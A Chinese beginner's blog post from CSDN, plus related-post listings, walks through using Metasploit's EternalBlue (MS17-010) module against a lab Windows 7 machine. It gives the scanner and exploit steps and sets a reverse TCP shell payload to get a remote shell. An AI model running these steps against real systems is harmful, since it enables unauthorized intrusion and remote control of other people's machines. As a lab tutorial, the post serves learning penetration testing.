利用metasploit工具 渗透win7*

最新推荐文章于 2024-04-13 10:23:45 发布
最新推荐文章于 2024-04-13 10:23:45 发布
阅读量1k 收藏 7
点赞数 5
分类专栏: linux 文章标签: linux 安全 shell
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_46168255/article/details/104383725
版权

利用metasploit工具 渗透win7

工具:kali linux ,win7 ,一个灵活的头脑

第一次写博客,写的不好请见谅。话不多说,开始。

首先打开metasploit工具,见图
每次打开在这里插入图片描述
每次打开这个工具大时候欢迎界面都是随机的,大家要注意。
exploits代表渗透模块 auxiliary代表辅助模块 post代表后渗透模块 payload代表攻击模块 encoders代表编码模块 不过常用的就是渗透模块和辅助模块

想必大家都知道永恒之蓝漏洞,我们就用永恒之蓝漏洞来渗透win7。

用search命令,寻找这个漏洞模块如图:

给出了5个攻击模组,前两个是辅助测试的,来让你知道对方ip使用的主机系统及版本
咱们先看第一个。用use命令
在这里插入图片描述
再利用show options命令 查看参数。如图可知我们还需要添加rhosts参数。及目标机的ip地址。
目标机的ip地址为:192.168.203.135
使用:set rhosts 192.168.203.135 添加ip地址
然后我们在查看一次参数
在这里插入图片描述
我们已经成功添加上了。
然后,使用run命令。查看目标主机的系统和版本号。
在这里插入图片描述
如图可知,目标主机的系统是win7家庭专业版。只有一个1个ip。

接下来,就是重头戏了。利用永恒之蓝漏洞渗透win7

利用use命令 选择永恒之蓝
在这里插入图片描述
继续添加rhosts
然后添加攻击载荷
在这里插入图片描述
挑选攻击载荷。挑选windows/x64/shell/reseves_tcp
然后在添加 主机ip以获得shell 使用set lhost 192.168.203.132添加。
最后 使用run命令 渗透到win7系统
在这里插入图片描述
这样 ,就渗透完成了
tips:由于windows和linux使用的编码方式不一样。所以可以使用 chcp 65001命令来转码。
第一次写,欢迎各位大佬批评指正。

练习两天半的渗透练习生
关注
  • 5
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
linux 数据链路层 socket编程 广播
qq_43559669的博客
04-12 371
Linux系统中,要进行数据链路层的socket编程,并发送广播包,你可以使用原始套接字(raw socket),并将IP头设置为广播地址。请注意,广播可能受到许多安全限制,并且通常只在局域网内使用。在外部网络上发送广播包可能会被网络管理员禁止或受到限制。此外,正确的以太网类型和其他以太网头部信息需要根据实际网络环境进行设置。这段代码创建了一个原始套接字,并设置了一个用于本地网络的广播地址。然后,它使用sendto函数发送一个字符串作为广播包。
利用Metasploit进行渗透测试
07-08
利用Metasploit进行渗透测试
渗透技术】一个渗透测试工具人是怎样操作的
HBohan的博客
01-19 1万+
朋友给了我一个授权的站点,让我帮忙测试,并记录整体流程。 从主站测试无果。通过信息收集,发现服务器还有一个疑似测试使用的旁站。 在GitHub上找到旁站源码,通过审计发现一个任意文件读取漏洞。读取数据库配置文件,连接数据库,发现主站的管理员账号密码,最终getshell
Metasploit内网安全渗透win7
m0_65364832的博客
01-16 1327
在Kali Linux中使用Metasploit通过ms17_010(永恒之蓝)对同一局域网下的主机的445端口和139端口进行内网渗透测试。通过实践操作,了解渗透测试基本过程。
hacker入门——最好用的渗透测试工具
热门推荐
华农老林的博客
10-12 1万+
前言: 本博客所有的黑客方面知识交流讨论仅供学习,请勿用于从事非法勾当! 苟利国家生死已,岂因福祸避趋之! 渗透测试,是专业安全人员为找出系统中的漏洞而进行的操作,这也是进行攻击前的第一个环节。 当然,是在恶意黑客找到这些漏洞之前,而这些业内安全专家各自钟爱的工具各种各样,一些工具是公开免费的,另一些则需要支付费用,但这篇文章向你保证,值得一看。 下面列举17个常用的渗透工具供大家参考。...
Metasploit入侵win7
qq_53030229的博客
11-07 1757
文章目录一、Metasploit是什么?1、Auxiliaries(辅助模块)2、Exploit(渗透攻击模块)3、payload(攻击载荷模块)4、Post(后期渗透模块)5、Encoder(编码工具模块)二、Metasploit入侵步骤1.引入库2.读入数据 一、Metasploit是什么? 这里我简单介绍一下,方便你们小白了解(大佬直接跳过就行) Metasploit框架是一个开源工具,旨在方便渗透测试,他是有ruby程序语言编写的模板化框架,具有很好的扩展性,便于渗透测试人员开发,使用定制的工具模板
渗透常用工具和用法
zzkkoo8的博客
02-15 2416
渗透常用工具和用法渗透常用工具和用法 nmap sqlmap metaspolite nmap1) 获取远程主机的系统类型及开放端口 nmap -sS -P0 -sV -O <target> 2) 列出开放了指定端口的主机列表 nmap -sT -p 80 -oG – 192.168.1.* | grep open 3) 在网络寻找所有在线主机 nmap -sP 192.168.0.* 5) 在某段
msf渗透win7
qq_61988806的博客
12-17 1561
环境设置 攻击机 kali 靶机 ip 192.168.1.110 题目 1.得到靶机最高权限的用户的登录密码 2.找到桌面下1文件夹中的1.txt 3.得到靶机的dns地址
记一次MSF永恒之蓝入侵win7系统实验
weixin_62297109的博客
12-31 2509
MSF是渗透安全人员非常重要的,必须了解的一个软件,这次实验记录一些msf最基础最简单的用法和命令,希望对大家入门有所帮助
使用MSF渗透攻击win7主机并远程执行命令
weixin_43991459的博客
06-15 2969
Win7 网络连接检查命令: Linux下: auxiliary是辅助模块用命令找寻关于ms17_010 的可运行模块用 指令,调用模块进行扫描,侦察靶机是否具备被攻击的条件通过 查看需要配置的参数,并用set进行配置,后面显示yes的必须设置若为【-】 以上说明已经打了改漏洞的补丁 刚才这个过程,是通过辅助模块探测目标主机的系统是否存在该漏洞。 下图的目标主机存在该漏洞 设置完成后出现【+】表示可以入侵 水印遮挡内容为: 开始加载使用入侵模块,进行入侵使用 指令查看可以使用的攻击载荷 若失败将靶机
Msfconsole使用永恒之蓝入侵Win7并上传执行可执行文件
简介
04-30 2452
我昨天我测试了,没成功所以SSH爆破先不写了,我已经把永恒之蓝漏洞玩明白了,这回是采用实战的方式进行入侵。提示:以下是本篇文章正文内容,下面案例可供参考本文就是讲解远程控制并执行文件。
Msf攻击Win7
07-09
Msf攻击Win7 metasploit
Metasploit_Exploit_pitchw9a_渗透工具_metasploit_
09-30
用于渗透测试、漏洞开发和漏洞恢复的Metasploit工具
Metasploit简单利用及入侵Windows7案例.docx
11-13
Metasploit 入门---漏洞利用实验,攻击机系统:kali linux虚拟机。本文选择MS17_010漏洞(永恒之蓝)和MS08-067漏洞利用来尝试入侵Windows7虚拟机系统,目标机系统:Windows7 x64虚拟机。
Metasploit渗透测试指南_渗透测试_metasploit_
10-04
介绍Metasploit使用方法,进行各种各样的渗透测试
Linux 内核学习(2) --- regulator 框架
最新发布
小猪佩奇的博客
04-13 653
Regulator 指的是稳定器(调压器),有电压稳定器及电流稳定器两种,能够自动维持恒定电流或者电压,其中,电压稳定器在电路中比较常见。从设备驱动的角度来看,regulator的控制比较简单,主要有 enable/disable/ 输出电压或电流大小的控制。Linux利用 regulator framework 对regulator进行管理和控制。由调节器供电的设备被称为消费者(它们消耗调节器提供的电力。大多数调节器可以启用和禁用他们的输出,一些也可以控制他们的输出电压或电流。
linux 设置定时任务---学习
hanweixiao的博客
04-10 268
linux定时任务学习
Linux 如何kill杀死(关闭)某个被占用的端口
爱上编程2705
04-10 425
例子:关闭8082端口。
LinuxLinux编译器-gcc/g++使用
qq_75000174的博客
04-10 1197
Linux中编译程序后默认的可执行程序的文件名为a.out,这也可以被修改。用gcc filename -o you.exe或者gcc -o my.exe filename (-o my.exe 要与filename相邻)。g++同理Gcc命令:gcc -DV1 test.c / gcc -D V2 test.c /gcc -DV3=1 test.c(-D和V1之间可以有空格,也可以没有)
利用Metasploit的永恒之蓝漏洞渗透win10
05-02
以下是使用Metasploit进行永恒之蓝漏洞渗透win10的步骤: 1. 首先,需要确定目标机器的IP地址和操作系统版本。可以使用nmap或其他扫描工具进行扫描。 2. 打开Kali Linux终端,输入msfconsole命令打开Metasploit...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值